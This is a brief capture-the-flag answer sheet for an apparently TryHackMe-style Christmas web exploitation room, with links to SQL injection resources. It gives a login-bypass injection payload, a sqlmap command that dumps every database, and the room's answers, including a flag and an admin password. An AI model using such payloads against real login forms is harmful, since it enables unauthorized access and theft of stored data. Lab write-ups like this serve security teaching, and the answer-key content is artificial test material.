Someone stole Santa's gift list!

Web Exploitation ; sql injection ; sqli ; sqlmap

Video

Resources

List of SQL Commands: https://www.codecademy.com/articles/sql-commands

Check out this cheat sheet: swisskyrepo/PayloadsAllTheThings

Payload list: payloadbox/sql-injection-payload-list

In-depth SQL Injection tutorial: SQLi Basics

SQLMAP cheatsheet

Challenge

Without using directory brute forcing, what's Santa's secret login panel?

/santapanel

Visit Santa's secret login panel and bypass the login using SQLi

Username 'or true --

Password '--

No answer needed

How many entries are there in the gift database?

Save Item

sqlmap -r santapanel.req --tamper=space2comment --dump-all -dbms sqlite

22

What did Paul ask for?

Github Ownership

What is the flag?

thmfox{All_I_Want_for_Christmas_Is_You}

What is admin's password?

EhCNSWzzFP6sc7gB

PreviousSanta's watchingNextBe careful with what you wish on a Christmas night

Last updated

Was this helpful?